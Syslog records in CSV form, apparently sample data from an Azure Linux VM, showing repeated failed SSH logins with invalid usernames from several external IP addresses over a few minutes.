+3930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:06,UbuntuDevEnv,2019-06-26 13:32:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,126574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:08,UbuntuDevEnv,2019-06-26 13:32:07,auth,UbuntuDevEnv,info,Failed password for invalid user webadmin from 201.48.54.81 port 58785 ssh2,126574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,201.48.54.8,58785,,
+3932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:08,UbuntuDevEnv,2019-06-26 13:32:08,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 58785:11: Bye Bye [preauth],126574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,58785,,
+3933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:08,UbuntuDevEnv,2019-06-26 13:32:08,auth,UbuntuDevEnv,info,Disconnected from invalid user webadmin 201.48.54.81 port 58785 [preauth],126574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,201.48.54.8,58785,,
+3934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:56,UbuntuDevEnv,2019-06-26 13:33:55,auth,UbuntuDevEnv,info,Invalid user wizard from 201.48.54.81 port 38950,126968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wizard,201.48.54.8,38950,,
+3935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:56,UbuntuDevEnv,2019-06-26 13:33:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,126968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:56,UbuntuDevEnv,2019-06-26 13:33:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:57,UbuntuDevEnv,2019-06-26 13:33:57,auth,UbuntuDevEnv,info,Failed password for invalid user wizard from 201.48.54.81 port 38950 ssh2,126968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wizard,201.48.54.8,38950,,
+3938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:58,UbuntuDevEnv,2019-06-26 13:33:57,auth,UbuntuDevEnv,info,Disconnected from invalid user wizard 201.48.54.81 port 38950 [preauth],126968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wizard,201.48.54.8,38950,,
+3939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:58,UbuntuDevEnv,2019-06-26 13:33:57,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 38950:11: Bye Bye [preauth],126968,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,38950,,
+3940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:34:01,UbuntuDevEnv,2019-06-26 13:34:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:34:01,UbuntuDevEnv,2019-06-26 13:34:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,126984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:34:01,UbuntuDevEnv,2019-06-26 13:34:00,auth,UbuntuDevEnv,info,Invalid user userA from 157.230.115.27 port 60664,126984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,userA,157.230.115.2,60664,,
+3943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:34:03,UbuntuDevEnv,2019-06-26 13:34:02,auth,UbuntuDevEnv,info,Failed password for invalid user userA from 157.230.115.27 port 60664 ssh2,126984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,userA,157.230.115.2,60664,,
+3944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:34:03,UbuntuDevEnv,2019-06-26 13:34:02,auth,UbuntuDevEnv,info,Disconnected from invalid user userA 157.230.115.27 port 60664 [preauth],126984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,userA,157.230.115.2,60664,,
+3945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:34:03,UbuntuDevEnv,2019-06-26 13:34:02,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 60664:11: Bye Bye [preauth],126984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,60664,,
+3946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:15,UbuntuDevEnv,2019-06-26 13:35:14,auth,UbuntuDevEnv,info,Invalid user rds from 139.199.34.112 port 45426,127243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rds,139.199.34.1,45426,,
+3947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:15,UbuntuDevEnv,2019-06-26 13:35:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,127243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:15,UbuntuDevEnv,2019-06-26 13:35:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:17,UbuntuDevEnv,2019-06-26 13:35:16,auth,UbuntuDevEnv,info,Failed password for invalid user rds from 139.199.34.112 port 45426 ssh2,127243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rds,139.199.34.1,45426,,
+3950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:17,UbuntuDevEnv,2019-06-26 13:35:17,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 45426:11: Bye Bye [preauth],127243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,45426,,
+3951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:17,UbuntuDevEnv,2019-06-26 13:35:17,auth,UbuntuDevEnv,info,Disconnected from invalid user rds 139.199.34.112 port 45426 [preauth],127243,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rds,139.199.34.1,45426,,
+3952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:23,UbuntuDevEnv,2019-06-26 13:35:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,127276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+3953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:23,UbuntuDevEnv,2019-06-26 13:35:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:23,UbuntuDevEnv,2019-06-26 13:35:22,auth,UbuntuDevEnv,info,Invalid user steam from 196.46.36.144 port 40277,127276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,196.46.36.1,40277,,
+3955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:25,UbuntuDevEnv,2019-06-26 13:35:24,auth,UbuntuDevEnv,info,Failed password for invalid user steam from 196.46.36.144 port 40277 ssh2,127276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,196.46.36.1,40277,,
+3956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:25,UbuntuDevEnv,2019-06-26 13:35:25,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 40277:11: Bye Bye [preauth],127276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,40277,,
+3957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:25,UbuntuDevEnv,2019-06-26 13:35:25,auth,UbuntuDevEnv,info,Disconnected from invalid user steam 196.46.36.144 port 40277 [preauth],127276,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,steam,196.46.36.1,40277,,
+3958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:42,UbuntuDevEnv,2019-06-26 13:35:42,auth,UbuntuDevEnv,info,Invalid user postgres3 from 157.230.115.27 port 49800,127353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres3,157.230.115.2,49800,,
+3959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:42,UbuntuDevEnv,2019-06-26 13:35:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,127353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:42,UbuntuDevEnv,2019-06-26 13:35:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:45,UbuntuDevEnv,2019-06-26 13:35:44,auth,UbuntuDevEnv,info,Failed password for invalid user postgres3 from 157.230.115.27 port 49800 ssh2,127353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres3,157.230.115.2,49800,,
+3962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:45,UbuntuDevEnv,2019-06-26 13:35:44,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 49800:11: Bye Bye [preauth],127353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,49800,,
+3963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:45,UbuntuDevEnv,2019-06-26 13:35:44,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres3 157.230.115.27 port 49800 [preauth],127353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres3,157.230.115.2,49800,,
+3964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:46,UbuntuDevEnv,2019-06-26 13:35:46,auth,UbuntuDevEnv,info,Invalid user admin from 193.32.163.182 port 47928,127367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,47928,,
+3965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:46,UbuntuDevEnv,2019-06-26 13:35:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.32.163.182,127367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.32.163.1,,0,
+3966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:46,UbuntuDevEnv,2019-06-26 13:35:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:49,UbuntuDevEnv,2019-06-26 13:35:48,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.32.163.182 port 47928 ssh2,127367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,47928,,
+3968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:35:49,UbuntuDevEnv,2019-06-26 13:35:48,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin 193.32.163.182 port 47928: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth]",127367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.32.163.1,47928,,
+3969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:36:08,UbuntuDevEnv,2019-06-26 13:36:07,auth,UbuntuDevEnv,info,Invalid user pentarun from 201.48.54.81 port 47348,127446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentarun,201.48.54.8,47348,,
+3970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:36:08,UbuntuDevEnv,2019-06-26 13:36:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:36:08,UbuntuDevEnv,2019-06-26 13:36:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,127446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:36:10,UbuntuDevEnv,2019-06-26 13:36:10,auth,UbuntuDevEnv,info,Failed password for invalid user pentarun from 201.48.54.81 port 47348 ssh2,127446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentarun,201.48.54.8,47348,,
+3973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:36:11,UbuntuDevEnv,2019-06-26 13:36:10,auth,UbuntuDevEnv,info,Disconnected from invalid user pentarun 201.48.54.81 port 47348 [preauth],127446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentarun,201.48.54.8,47348,,
+3974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:36:11,UbuntuDevEnv,2019-06-26 13:36:10,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 47348:11: Bye Bye [preauth],127446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,47348,,
+3975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:23,UbuntuDevEnv,2019-06-26 13:37:22,auth,UbuntuDevEnv,info,Invalid user hs from 139.199.34.112 port 32984,127716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hs,139.199.34.1,32984,,
+3976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:23,UbuntuDevEnv,2019-06-26 13:37:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:23,UbuntuDevEnv,2019-06-26 13:37:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,127716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:25,UbuntuDevEnv,2019-06-26 13:37:24,auth,UbuntuDevEnv,info,Failed password for invalid user hs from 139.199.34.112 port 32984 ssh2,127716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hs,139.199.34.1,32984,,
+3979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:25,UbuntuDevEnv,2019-06-26 13:37:24,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 32984:11: Bye Bye [preauth],127716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,32984,,
+3980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:25,UbuntuDevEnv,2019-06-26 13:37:24,auth,UbuntuDevEnv,info,Disconnected from invalid user hs 139.199.34.112 port 32984 [preauth],127716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hs,139.199.34.1,32984,,
+3981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:31,UbuntuDevEnv,2019-06-26 13:37:31,auth,UbuntuDevEnv,info,Invalid user admin from 157.230.115.27 port 38928,127746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.115.2,38928,,
+3982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:31,UbuntuDevEnv,2019-06-26 13:37:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:31,UbuntuDevEnv,2019-06-26 13:37:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,127746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:34,UbuntuDevEnv,2019-06-26 13:37:33,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 157.230.115.27 port 38928 ssh2,127746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.115.2,38928,,
+3985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:34,UbuntuDevEnv,2019-06-26 13:37:33,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 38928:11: Bye Bye [preauth],127746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,38928,,
+3986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:37:34,UbuntuDevEnv,2019-06-26 13:37:33,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 157.230.115.27 port 38928 [preauth],127746,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,157.230.115.2,38928,,
+3987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:01,UbuntuDevEnv,2019-06-26 13:38:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,127841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+3988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:01,UbuntuDevEnv,2019-06-26 13:38:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,127841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:38:01,UbuntuDevEnv,2019-06-26 13:38:01,auth,UbuntuDevEnv,info,Invalid user guest from 196.46.36.144 port 48450,127841,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,196.46.36.1,48450,,
